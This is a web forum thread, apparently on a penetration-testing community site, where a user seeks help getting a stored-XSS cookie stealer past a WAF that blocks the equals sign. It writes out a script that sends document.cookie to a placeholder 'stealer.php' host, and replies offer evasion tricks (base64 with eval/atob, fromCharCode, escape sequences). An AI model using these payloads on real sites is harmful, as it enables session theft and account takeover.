Jump to content
friedfish

XSS cookie stealer without equals

Recommended Posts

friedfish

Hi all,

 

I am trying to pentest a web application, I found a persistent XSS on a comment php page so I am able to trigger the classical modified payload 


<script>

location.href = http://www.yoursite.com/stealer.php?cookie = +document.cookie;

</script>

Unfortunately there is a WAF that filters the equal sign 


<script>

location.href = http://www.yoursite.com/stealer.php?cookie = +document.cookie;

</script>

 and I am not able to run a cookie redirect script. 

 

I tried to encode = 


<script>

location.href = http://www.yoursite.com/stealer.php?cookie = +document.cookie;

</script>

with firebug on the source code I see this result:

 


<script>

location.href = http://www.yoursite.com/stealer.php?cookie = +document.cookie;

</script>

 

and obviously doesn't work.

 

I also tried the example in the following link with the same failure result:

http://security.stackexchange.com/questions/36629/cross-site-scripting-without-special-chars

 

Do you have any suggestion?

 

Thank you!

Share this post


Link to post
GiRa

This could work:

$ echo -n 'alert("example")  ' | base64YWxlcnQoImV4YW1wbGUiKSAg

Please note the trailing spaces in the echo argument, to prevent the base64 encoding to display equals signs.

 

Then in JS:

eval(atob('YWxlcnQoImV4YW1wbGUiKSAg'))

Share this post


Link to post
friedfish

Thank you GiRa but it doesn't work:

With firebug I see the following source code:

 

<p>

<script>

eval(atob('ywxlcnqoimv4yw1wbguiksag'))

</script>

</p>

Share this post


Link to post
GiRa

So, everything is converted to lowercase.

 

An eval(String.fromCharCode(...)) should work then.

 

Edit: does the filter detect '==' vs just '='?

Share this post


Link to post
friedfish

yes,

 

just tried, filter all equals, = == === 

 

I have no idea how to bypass it... The strange thing is that if I encode the script in HTML I see the equals:

 


<strong class="primary-font">

<p> <sc=ript>al=ert(eval(atob('ywxlcnqoimv4yw1wbguiksag')))</sc=ript> </p>

</div>

Share this post


Link to post
Giuseppe

I don't think String.fromCharCode will work because it will be translated to string.fromcharcode that is not valid.

Anyway, you should try to enumerate all the filters, for example chars blocked, string translations and so on ...

 

First (of many) attempt(s): "is it present a character escaping filter?"

<sc=ript>eval('\x61lert(1)')</scr=ipt><sc=ript>eval('\u0061lert(1)')</scr=ipt>
...

 

The WAPTx has a dedicated module for this :P

Share this post


Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
×